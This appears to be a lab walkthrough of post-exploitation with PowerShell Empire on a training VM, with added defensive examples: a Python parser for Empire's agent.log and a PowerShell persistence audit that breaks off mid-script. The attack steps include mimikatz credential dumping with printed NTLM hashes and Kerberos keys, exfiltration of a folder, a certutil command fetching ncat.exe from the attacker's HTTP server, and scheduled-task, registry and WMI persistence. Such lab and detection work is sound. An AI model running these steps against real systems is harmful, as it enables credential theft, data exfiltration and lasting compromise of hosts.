(Empire: SANS560HighPrivBypassUAC) > shell
[*] Exit Shell Menu with Ctrl+C
(SANS560HighPrivBypassUAC) C:\WINDOWS\system32 > cmd.exe /c "type c:\windows\system32\mimisla.log"
(SANS560HighPrivBypassUAC) C:\WINDOWS\system32 >

Looking at the agent.log file. The first command used the filename mimisla.log (as printed by the module) and returned nothing; rerunning it with the correct name, mimilsa.log, shows the captured logons.

2021-11-20 19:13:16 : 
tasked agent 8XW5324B to run command cmd.exe /c "type c:\windows\system32\mimisla.log"

2021-11-20 19:13:49 : 


2021-11-20 19:17:44 : 
tasked agent 8XW5324B to run command cmd.exe /c "type c:\windows\system32\mimilsa.log"

2021-11-20 19:17:50 : 
[00000000:00d9afac] SEC560STUDENT\sec560        sec560
[00000000:00d9afd7] SEC560STUDENT\sec560        sec560
[00000000:010ced5a] SEC560STUDENT\sec560        sec560
[00000000:010ceec4] SEC560STUDENT\sec560        sec560
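Every step above is checked the same way, by reading the agent.log, and an incident responder who recovers that log from a seized or shared Empire server has to do the reverse: reconstruct what was tasked, and which accounts memssp exposed. The parser below is an added example written for this page, not Empire's own code; its input is a constructed excerpt in the log layout shown above, and the Event record and the event kind names are my own.

```python
import re
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional

# Constructed excerpt in the layout of Empire's agent.log as reproduced on this page:
# a "YYYY-MM-DD HH:MM:SS : " header line, the entry body, then a blank line. The
# bracketed lines are the memssp (mimilsa.log) output the "type" command returned.
SAMPLE_AGENT_LOG = """\
2021-11-20 19:06:32 : 
tasked agent SANS560HighPrivBypassUAC to run module Invoke-Mimikatz memssp

2021-11-20 19:17:44 : 
tasked agent 8XW5324B to run command cmd.exe /c "type c:\\windows\\system32\\mimilsa.log"

2021-11-20 19:17:50 : 
[00000000:00d9afac] SEC560STUDENT\\sec560        sec560
[00000000:00d9afd7] SEC560STUDENT\\sec560        sec560
[00000000:010ced5a] SEC560STUDENT\\sec560        sec560
[00000000:010ceec4] SEC560STUDENT\\sec560        sec560

2021-11-20 21:12:02 : 
Tasked agent to download c:\\tmp\\*.*
"""

HEADER_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) :\s*$")
# Message shapes seen in the agent.log excerpts on this page, keyed by event kind.
PATTERNS = [
    ("module", re.compile(r"^tasked agent (?P<agent>\S+) to run module (?P<detail>.+)$")),
    ("command", re.compile(r"^tasked agent (?P<agent>\S+) to run command (?P<detail>.+)$")),
    ("download_request", re.compile(r"^Tasked agent to download (?P<detail>.+)$")),
]
# memssp log line: [<LUID high>:<LUID low>] DOMAIN\user <whitespace> password
MEMSSP_RE = re.compile(r"^\[([0-9A-Fa-f]{8}):([0-9A-Fa-f]{8})\]\s+([^\\\s]+)\\(\S+)\s+(\S.*)$")


@dataclass
class Event:
    ts: datetime
    kind: str             # a PATTERNS name, or "other" for module/command output
    detail: str           # module name, command line, path, or the first body line
    agent: Optional[str]  # only present on "tasked agent <name>" lines
    body: str


def parse_agent_log(text: str) -> List[Event]:
    """Group each timestamp header with the body lines that follow it."""
    events: List[Event] = []
    ts: Optional[datetime] = None
    body: List[str] = []

    def flush() -> None:
        if ts is None:
            return
        text_body = "\n".join(body).strip()
        first = text_body.splitlines()[0] if text_body else ""
        kind, detail, agent = "other", first, None
        for name, rx in PATTERNS:
            m = rx.match(first)
            if m:
                kind, detail, agent = name, m.group("detail"), m.groupdict().get("agent")
                break
        events.append(Event(ts, kind, detail, agent, text_body))

    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            flush()
            ts, body = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S"), []
        elif ts is not None:
            body.append(line)
    flush()
    return events


def operator_actions(events: List[Event]) -> List[str]:
    """One line per tasking, for the incident timeline."""
    return [f"{ev.ts:%Y-%m-%d %H:%M:%S} {ev.kind:<16} {ev.agent or '-':<24} {ev.detail}"
            for ev in events if ev.kind in ("module", "command", "download_request")]


def mask(pw: str) -> str:
    return "*" * len(pw) if len(pw) <= 2 else pw[0] + "*" * (len(pw) - 2) + pw[-1]


def exposed_accounts(events: List[Event]) -> Dict[str, Dict[str, object]]:
    """Accounts whose plaintext password memssp logged, pulled from any entry body.
    Passwords are masked so the list can go straight to whoever forces the resets."""
    out: Dict[str, Dict[str, object]] = {}
    for ev in events:
        for line in ev.body.splitlines():
            m = MEMSSP_RE.match(line.rstrip())
            if not m:
                continue
            hi, lo, domain, user, pw = m.groups()
            rec = out.setdefault(f"{domain}\\{user}",
                                 {"captures": 0, "logon_ids": [], "masked": mask(pw.rstrip())})
            rec["captures"] += 1
            rec["logon_ids"].append((int(hi, 16) << 32) | int(lo, 16))
    return out
```

Each logon id is the LUID from the bracketed prefix, which lets the captured entries be matched against the "Authentication Id" values in the sekurlsa::logonpasswords output above.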

Grabbing the Security Accounts Manager (SAM) Database.

(Empire: SANS560HighPrivBypassUAC) > usemodule powershell/credentials/mimikatz/sam
[*] Set Agent to SANS560HighPrivBypassUAC

┌Record Options────────────────────┬──────────┬─────────────────────────┐
│ Name  │ Value                    │ Required │ Description             │
├───────┼──────────────────────────┼──────────┼─────────────────────────┤
│ Agent │ SANS560HighPrivBypassUAC │ True     │ Agent to run module on. │
└───────┴──────────────────────────┴──────────┴─────────────────────────┘

(Empire: usemodule/powershell/credentials/mimikatz/sam) > execute
[*] Tasked SANS560HighPrivBypassUAC to run Task 6

As always, reviewing the agent.log.

2021-11-20 19:22:27 : 
tasked agent SANS560HighPrivBypassUAC to run module Invoke-Mimikatz SAM dump

2021-11-20 19:23:04 : 
Job started: VTZ9NY

2021-11-20 19:24:05 : 
Hostname: Sec560Student / S-1-5-21-2977773840-2930198165-1551093962

  .#####.   mimikatz 2.2.0 (x64) #19041 Jun  9 2021 18:55:28
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM

584     {0;000003e7} 1 D 42955          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;0007007d} 1 F 8903583     SEC560STUDENT\sec560    S-1-5-21-2977773840-2930198165-1551093962-1202  (14g,24p)        Primary
 * Thread Token  : {0;000003e7} 1 D 17857121    NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz(powershell) # lsadump::sam
Domain : SEC560STUDENT
SysKey : e2a5379f049ff5f37e322618f569e020
Local SID : S-1-5-21-2977773840-2930198165-1551093962

SAMKey : e40f50ec79bc899e9e73681cc1f1ef10

RID  : 000001f4 (500)
User : Administrator

RID  : 000001f5 (501)
User : Guest

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000001f8 (504)
User : WDAGUtilityAccount
  Hash NTLM: 9679f78eec859fdedb8c208c8fcf4abf

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 118e9239b1e3131c604aed931a6483ce

* Primary:Kerberos-Newer-Keys *
    Default Salt : SEC504STUDENTWDAGUtilityAccount
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 4ad74d67e523c7f6715edb2d899c236f6d1e315470fe74249262b923ab006874
      aes128_hmac       (4096) : a2f2ec30564c95960931d0480acb9220
      des_cbc_md5       (4096) : 46a82389e0649e1c

...

* Primary:Kerberos-Newer-Keys *
    Default Salt : SEC560STUDENTnotadmin
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 7b462c5e57de3a5fae465b5288b3cafd4550b99e179cf5c31f51cac45d42c0e3
      aes128_hmac       (4096) : 08926d92cb36e12aeabdf81cdc238131
      des_cbc_md5       (4096) : fd1a079dd0b94cbc

...

mimikatz(powershell) # token::revert
 * Process Token : {0;0007007d} 1 F 8903583     SEC560STUDENT\sec560    S-1-5-21-2977773840-2930198165-1551093962-1202  (14g,24p)        Primary
 * Thread Token  : no token

Grabbing credentials with Rubeus.

2021-11-20 19:30:53 : 
tasked agent SANS560HighPrivBypassUAC to run module Invoke-Rubeus

2021-11-20 19:31:07 : 
Administrator:500:24d666dff420a669de4afb2f96b214dd:372c5f8eb6a2e4b07caa7a4d5d7bcf30:::
Guest:501:edb8bd2a41d54ed296c4a6ca3e9ec80f:882b4fb7507002487e96831d1297822f:::
DefaultAccount:503:e455c45a5adc07078973696d3f86c447:2545ae7899dec24956cc2a248e974601:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:9679f78eec859fdedb8c208c8fcf4abf:::
sec560:1202:aad3b435b51404eeaad3b435b51404ee:7abdbb1631d1674637aa354c4b4dd273:::
notadmin:1203:aad3b435b51404eeaad3b435b51404ee:c62638b38308e651b21a0f2ccab3ac9b:::
clark:1210:aad3b435b51404eeaad3b435b51404ee:594bb6d6d86a285ea1c8b04fd1f306e9:::
john:1211:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::

Now that we have credentials, time to move on.

6. Capturing packets

Time to capture some packets, so that we can analyze them later to see what is going on on this host.

(Empire: SANS560HighPrivBypassUAC) > usemodule powershell/collection/packet_capture
[*] Set Agent to SANS560HighPrivBypassUAC

(Empire: usemodule/powershell/collection/packet_capture) > set MaxSize 1MB
[*] Set MaxSize to 1MB

(Empire: usemodule/powershell/collection/packet_capture) > set TraceFile c:\\tmp\\capture.etl
[*] Set TraceFile to c:\tmp\capture.etl

(Empire: usemodule/powershell/collection/packet_capture) > options

┌Record Options─────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name       │ Value                    │ Required │ Description                         │
├────────────┼──────────────────────────┼──────────┼─────────────────────────────────────┤
│ Agent      │ SANS560HighPrivBypassUAC │ True     │ Agent to run module on.             │
├────────────┼──────────────────────────┼──────────┼─────────────────────────────────────┤
│ MaxSize    │ 1MB                      │ True     │ Maximum size of capture file. Blank │
│            │                          │          │ for no limit.                       │
├────────────┼──────────────────────────┼──────────┼─────────────────────────────────────┤
│ Persistent │                          │ False    │ Switch. Persist capture across      │
│            │                          │          │ reboots.                            │
├────────────┼──────────────────────────┼──────────┼─────────────────────────────────────┤
│ StopTrace  │                          │ False    │ Switch. Stop trace capture.         │
├────────────┼──────────────────────────┼──────────┼─────────────────────────────────────┤
│ TraceFile  │ c:\tmp\capture.etl       │ True     │ File to log the capture out to.     │
└────────────┴──────────────────────────┴──────────┴─────────────────────────────────────┘

(Empire: usemodule/powershell/collection/packet_capture) > execute
[*] Tasked SANS560HighPrivBypassUAC to run Task 9

Looking at the agent.log

2021-11-20 19:45:10 : 
tasked agent SANS560HighPrivBypassUAC to run module Invoke-PacketCapture

2021-11-20 19:45:16 : 

Trace configuration:
-------------------------------------------------------------------
Status:             Running
Trace File:         C:\tmp\capture.etl
Append:             Off
Circular:           On
Max Size:           1 MB
Report:             Off

Stopping the trace.

(Empire: usemodule/powershell/collection/packet_capture) > set StopTrace True
[*] Set StopTrace to True
(Empire: usemodule/powershell/collection/packet_capture) > execute
[*] Tasked SANS560HighPrivBypassUAC to run Task 17

Looking at the agent.log.

2021-11-20 21:06:05 : 
Merging traces ... done
Generating data collection ... done
The trace file and additional troubleshooting information have been compiled as "c:\tmp\capture.cab".
File location = c:\tmp\capture.etl
Tracing session was successfully stopped.


7. Downloading contents - Exfiltration

Using the download option.

(Empire: usemodule/powershell/collection/packet_capture) > interact SANS560HighPrivBypassUAC
[*] Task 12 results received
(Empire: SANS560HighPrivBypassUAC) >

Downloading all contents within the c:\tmp\ directory.

(Empire: SANS560HighPrivBypassUAC) > download c:\\tmp\\*.*
[*] Tasked SANS560HighPrivBypassUAC to run Task 18

The Powershell-Empire server console shows:

[+] Part of file build1.xml from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp
[+] Part of file build2.xml from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp
[+] Part of file capture.cab from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp
[+] Part of file capture.etl from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp
[+] Part of file launcher.xml from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp
[+] Part of file MSBuild.exe from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp
[+] Part of file test.txt from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp

Looking at the agent.log ...

2021-11-20 21:12:02 : 
Tasked agent to download c:\tmp\*.*

2021-11-20 21:12:06 : 
file download: C:\tmp\build1.xml, part: 0

2021-11-20 21:13:07 : 
file download: C:\tmp\build2.xml, part: 0

2021-11-20 21:14:08 : 
file download: C:\tmp\capture.cab, part: 0

2021-11-20 21:15:12 : 
file download: C:\tmp\capture.etl, part: 0

2021-11-20 21:16:12 : 
file download: C:\tmp\launcher.xml, part: 0

2021-11-20 21:17:13 : 
file download: C:\tmp\MSBuild.exe, part: 0

2021-11-20 21:18:13 : 
file download: C:\tmp\test.txt, part: 0

2021-11-20 21:19:13 : 
[*] File download of C:\tmp\build1.xml completed

2021-11-20 21:19:14 : 
[*] File download of C:\tmp\build2.xml completed

2021-11-20 21:19:14 : 
[*] File download of C:\tmp\capture.cab completed

2021-11-20 21:19:14 : 
[*] File download of C:\tmp\capture.etl completed

2021-11-20 21:19:14 : 
[*] File download of C:\tmp\launcher.xml completed

2021-11-20 21:19:14 : 
[*] File download of C:\tmp\MSBuild.exe completed

2021-11-20 21:19:14 : 
[*] File download of C:\tmp\test.txt completed

Confirming the files were successfully downloaded and are now stored on our attacking machine.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# ls /var/lib/powershell-empire/downloads/8XW5324B/C\:/tmp/ -l
total 1720
-rw-r--r-- 1 root root     833 Nov 20 21:12 build1.xml
-rw-r--r-- 1 root root    3951 Nov 20 21:13 build2.xml
-rw-r--r-- 1 root root  432248 Nov 20 21:14 capture.cab
-rw-r--r-- 1 root root 1048576 Nov 20 21:15 capture.etl
-rw-r--r-- 1 root root    3941 Nov 20 21:16 launcher.xml
-rw-r--r-- 1 root root  261688 Nov 20 21:17 MSBuild.exe
-rw-r--r-- 1 root root      17 Nov 20 21:18 test.txt

There we go, with a successful exfiltration.

8. Uploading contents to the host.

I was having some problems with the upload module. Not sure what I was doing wrong. 

Looking at the help, this is what it shows.

(Empire: 8XW5324B) > upload --help
        Tasks an the specified agent to upload a file.

        Usage: upload <local_file_directory> [destination_file_name]

However, none of my activities generated a new task. For example, I tried the following 2 strategies:

(Empire: 73H864SX) > upload /home/securitynik/WinTools/ncat.exe c:\\tmp\\ncat.exe
(Empire: 73H864SX) > upload /home/securitynik/WinTools/ncat.exe 

None of the uploads I did generated a task, so I tried another method to get the file onto the file system. I guess whatever works is all that matters.

Hosted my file using Python SimpleHTTPServer:

┌──(root💀securitynik)-[/home/securitynik/WinTools]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Dropping to the shell and executing Certutil.

(Empire: 73H864SX) > shell
[*] Exit Shell Menu with Ctrl+C
(73H864SX)  > cmd.exe /c "certutil -URLCache -F http://10.0.0.107:80/ncat.exe ncat.exe"

Looking at the Python HTTP server, I see the file has been successfully downloaded.

┌──(root💀securitynik)-[/home/securitynik/WinTools]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.0.0.110 - - [21/Nov/2021 18:51:04] "GET /ncat.exe HTTP/1.1" 200 -
10.0.0.110 - - [21/Nov/2021 18:51:04] "GET /ncat.exe HTTP/1.1" 200 -

Reviewing the agent.log, I see.

2021-11-21 18:50:29 : 
tasked agent 73H864SX to run command certutil -URLCache -F http://10.0.0.107:80/ncat.exe c:\tmp\ncat.exe

2021-11-21 18:51:04 : 
****  Online  ****
CertUtil: -URLCache command completed successfully.
 

Running dir on the host to confirm the file was successfully downloaded.

(73H864SX)  > dir c:\tmp\ncat.exe
Mode   Owner               LastWriteTime           Length Name    
----   -----               -------------           ------ ----    
-a---- NT AUTHORITY\SYSTEM 11/21/2021 10:38:27 PM 1667584 ncat.exe

While I was unable to get the upload feature of Powershell Empire to work, I was still able to achieve my objective.


9. Persistence

For persistence, I like scheduled tasks, as they allow you to have predictability in controlling how and when your malicious code can execute.

(Empire: SANS560HighPrivBypassUAC) > usemodule powershell/persistence/elevated/schtasks
[*] Set Agent to SANS560HighPrivBypassUAC

(Empire: usemodule/powershell/persistence/elevated/schtasks) > set OnLogon True
[*] Set OnLogon to True

(Empire: usemodule/powershell/persistence/elevated/schtasks) > set UserAgent Securitynik-Persistence-Schtasks-UserAgent
[*] Set UserAgent to Securitynik-Persistence-Schtasks-UserAgent

(Empire: usemodule/powershell/persistence/elevated/schtasks) > options

┌Record Options────┬─────────────────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name             │ Value                               │ Required │ Description                         │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ADSPath          │                                     │ False    │ Alternate-data-stream location to   │
│                  │                                     │          │ store the script code.              │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Agent            │ SANS560HighPrivBypassUAC            │ True     │ Agent to run module on.             │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Bypasses         │ mattifestation etw                  │ False    │ Bypasses as a space separated list  │
│                  │                                     │          │ to be prepended to the launcher.    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Cleanup          │                                     │ False    │ Switch. Cleanup the trigger and any │
│                  │                                     │          │ script from specified location.     │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ DailyTime        │ 09:00                               │ False    │ Daily time to trigger the script    │
│                  │                                     │          │ (HH:mm).                            │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ExtFile          │                                     │ False    │ Use an external file for the        │
│                  │                                     │          │ payload instead of a stager.        │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ IdleTime         │                                     │ False    │ User idle time (in minutes) to      │
│                  │                                     │          │ trigger script.                     │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Listener         │ http                                │ False    │ Listener to use.                    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Obfuscate        │ False                               │ False    │ Switch. Obfuscate the launcher      │
│                  │                                     │          │ powershell code, uses the           │
│                  │                                     │          │ ObfuscateCommand for obfuscation    │
│                  │                                     │          │ types. For powershell only.         │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ObfuscateCommand │ Token\All\1                         │ False    │ The Invoke-Obfuscation command to   │
│                  │                                     │          │ use. Only used if Obfuscate switch  │
│                  │                                     │          │ is True. For powershell only.       │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ OnLogon          │ True                                │ False    │ Switch. Trigger script on user      │
│                  │                                     │          │ logon.                              │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy            │ default                             │ False    │ Proxy to use for request (default,  │
│                  │                                     │          │ none, or other).                    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds       │ default                             │ False    │ Proxy credentials                   │
│                  │                                     │          │ ([domain\]username:password) to use │
│                  │                                     │          │ for request (default, none, or      │
│                  │                                     │          │ other).                             │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ RegPath          │ HKLM:\Software\Microsoft\Network\de │ False    │ Registry location to store the      │
│                  │ bug                                 │          │ script code. Last element is the    │
│                  │                                     │          │ key name.                           │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ TaskName         │ SecurityNik-Empire-Schtask          │ True     │ Name to use for the schtask.        │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent        │ Securitynik-Persistence-Schtasks-   │ False    │ User-agent string to use for the    │
│                  │ UserAgent                           │          │ staging request (default, none, or  │
│                  │                                     │          │ other).                             │
└──────────────────┴─────────────────────────────────────┴──────────┴─────────────────────────────────────┘

(Empire: usemodule/powershell/persistence/elevated/schtasks) > execute
[*] Tasked SANS560HighPrivBypassUAC to run Task 19

Looking at the agent.log.

2021-11-20 21:33:56 : 
tasked agent SANS560HighPrivBypassUAC to run module Invoke-Schtasks

2021-11-20 21:34:16 : 
SUCCESS: The scheduled task "SecurityNik-Empire-Schtask" has successfully been created.
Schtasks persistence established using listener http stored in HKLM:\Software\Microsoft\Network\debug with SecurityNik-Empire-Schtask OnLogon trigger.

Leveraging the registry persistence.

(Empire: SANS560HighPrivBypassUAC) > usemodule powershell/persistence/elevated/registry
[*] Set Agent to SANS560HighPrivBypassUAC

(Empire: usemodule/powershell/persistence/elevated/registry) >  set UserAgent SecurityNik-Registry-Persistence
[*] Set UserAgent to SecurityNik-Registry-Persistence

(Empire: usemodule/powershell/persistence/elevated/registry) > set Listener http
[*] Set Listener to http

(Empire: usemodule/powershell/persistence/elevated/registry) > options

┌Record Options────┬─────────────────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name             │ Value                               │ Required │ Description                         │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ADSPath          │                                     │ False    │ Alternate-data-stream location to   │
│                  │                                     │          │ store the script code.              │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Agent            │ SANS560HighPrivBypassUAC            │ True     │ Agent to run module on.             │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Bypasses         │ mattifestation etw                  │ False    │ Bypasses as a space separated list  │
│                  │                                     │          │ to be prepended to the launcher.    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Cleanup          │                                     │ False    │ Switch. Cleanup the trigger and any │
│                  │                                     │          │ script from specified location.     │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ExtFile          │                                     │ False    │ Use an external file for the        │
│                  │                                     │          │ payload instead of a stager.        │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ KeyName          │ Updater                             │ True     │ Key name for the run trigger.       │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Listener         │ http                                │ False    │ Listener to use.                    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Obfuscate        │ False                               │ False    │ Switch. Obfuscate the launcher      │
│                  │                                     │          │ powershell code, uses the           │
│                  │                                     │          │ ObfuscateCommand for obfuscation    │
│                  │                                     │          │ types. For powershell only.         │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ObfuscateCommand │ Token\All\1                         │ False    │ The Invoke-Obfuscation command to   │
│                  │                                     │          │ use. Only used if Obfuscate switch  │
│                  │                                     │          │ is True. For powershell only.       │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy            │ default                             │ False    │ Proxy to use for request (default,  │
│                  │                                     │          │ none, or other).                    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds       │ default                             │ False    │ Proxy credentials                   │
│                  │                                     │          │ ([domain\]username:password) to use │
│                  │                                     │          │ for request (default, none, or      │
│                  │                                     │          │ other).                             │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ RegPath          │ HKLM:SOFTWARE\Microsoft\Windows\Cur │ False    │ Registry location to store the      │
│                  │ rentVersion\Debug                   │          │ script code. Last element is the    │
│                  │                                     │          │ key name.                           │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent        │ SecurityNik-Registry-Persistence    │ False    │ User-agent string to use for the    │
│                  │                                     │          │ staging request (default, none, or  │
│                  │                                     │          │ other).                             │
└──────────────────┴─────────────────────────────────────┴──────────┴─────────────────────────────────────┘

(Empire: usemodule/powershell/persistence/elevated/registry) > execute
[*] Tasked SANS560HighPrivBypassUAC to run Task 21

Looking at the agent.log.

2021-11-20 21:51:27 : 
tasked agent SANS560HighPrivBypassUAC to run module Invoke-Registry

2021-11-20 21:52:18 : 
Registry persistence established using listener http stored in HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug.

Finally, persistence via WMI.

(Empire: SANS560HighPrivBypassUAC) > usemodule powershell/persistence/elevated/wmi
[*] Set Agent to SANS560HighPrivBypassUAC

(Empire: usemodule/powershell/persistence/elevated/wmi) >  set UserAgent SecurityNik-WMI-Persistence
[*] Set UserAgent to SecurityNik-WMI-Persistence

(Empire: usemodule/powershell/persistence/elevated/wmi) > set DailyTime 09:00
[*] Set DailyTime to 09:00

(Empire: usemodule/powershell/persistence/elevated/wmi) > set Listener http
[*] Set Listener to http


(Empire: usemodule/powershell/persistence/elevated/wmi) > options

┌Record Options─────────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name        │ Value                       │ Required │ Description                         │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Agent       │ SANS560HighPrivBypassUAC    │ True     │ Agent to run module on.             │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ AtStartup   │ True                        │ False    │ Switch. Trigger script (within 5    │
│             │                             │          │ minutes) of system startup.         │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Cleanup     │                             │ False    │ Switch. Cleanup the trigger and any │
│             │                             │          │ script from specified location.     │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ DailyTime   │ 09:00                       │ False    │ Daily time to trigger the script    │
│             │                             │          │ (HH:mm).                            │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ExtFile     │                             │ False    │ Use an external file for the        │
│             │                             │          │ payload instead of a stager.        │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ FailedLogon │                             │ False    │ Trigger script with a failed logon  │
│             │                             │          │ attempt from a specified user       │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Listener    │ http                        │ True     │ Listener to use.                    │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy       │ default                     │ False    │ Proxy to use for request (default,  │
│             │                             │          │ none, or other).                    │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds  │ default                     │ False    │ Proxy credentials                   │
│             │                             │          │ ([domain\]username:password) to use │
│             │                             │          │ for request (default, none, or      │
│             │                             │          │ other).                             │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ SubName     │ Updater                     │ True     │ Name to use for the event           │
│             │                             │          │ subscription.                       │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent   │ SecurityNik-WMI-Persistence │ False    │ User-agent string to use for the    │
│             │                             │          │ staging request (default, none, or  │
│             │                             │          │ other).                             │
└─────────────┴─────────────────────────────┴──────────┴─────────────────────────────────────┘

(Empire: usemodule/powershell/persistence/elevated/wmi) > execute
[*] Tasked SANS560HighPrivBypassUAC to run Task 22

Looking at the agent.log file.

2021-11-20 22:10:58 : 
tasked agent SANS560HighPrivBypassUAC to run module Invoke-WMI

2021-11-20 22:11:20 : 
WMI persistence established using listener http WMI subscription daily trigger at 09:00.
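Each of the three persistence mechanisms set up in this section leaves an artifact that can be queried from the host. The following is an added example (mine, not from the original post or from Empire): a PowerShell audit for the scheduled task, the registry payload and Run key, and the WMI subscription. It uses the task name, RegPath values and the Updater default shown in the module options above, and assumes the standard HKLM Run key as the location of the registry module's "run trigger".

```powershell
# Added example, not from the original post: audit a Windows host for the three
# persistence mechanisms set up in this section. The task name, RegPath values
# and the SubName/KeyName default come from the module options shown above; the
# Run key location is an assumption based on KeyName being "the run trigger".
$TaskName   = 'SecurityNik-Empire-Schtask'
$PayloadReg = @('HKLM:\Software\Microsoft\Network\debug',
                'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Debug')
$RunKey     = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'   # assumed
$SubName    = 'Updater'   # default for both KeyName (registry) and SubName (WMI)

$findings = New-Object System.Collections.Generic.List[object]
function Add-Finding($Kind, $Name, $Where, $Detail) {
    $findings.Add([pscustomobject]@{ Kind = $Kind; Name = $Name; Where = $Where; Detail = $Detail })
}

# 1. Scheduled tasks: match the known name, but also any task whose action runs
#    powershell and reads its command back out of HKLM, which is the shape of a
#    registry-stored payload whatever name the operator picked.
foreach ($t in Get-ScheduledTask) {
    foreach ($a in $t.Actions) {
        $cmd = "$($a.Execute) $($a.Arguments)"
        if ($t.TaskName -eq $TaskName -or
            ($cmd -match 'powershell' -and $cmd -match 'HKLM|Get-ItemProperty|\bgp\b|-enc')) {
            Add-Finding 'ScheduledTask' $t.TaskName $t.TaskPath $cmd
        }
    }
}

# 2. Registry: the payload storage paths from the RegPath options, plus Run-key
#    entries that launch powershell with a registry read or an encoded command.
foreach ($p in $PayloadReg) {
    if (Test-Path $p) {
        (Get-ItemProperty $p).PSObject.Properties |
            Where-Object { $_.Name -notlike 'PS*' } |
            ForEach-Object {
                $v = "$($_.Value)"
                Add-Finding 'RegistryPayload' $_.Name $p ($v.Substring(0, [Math]::Min(60, $v.Length)))
            }
    }
}
if (Test-Path $RunKey) {
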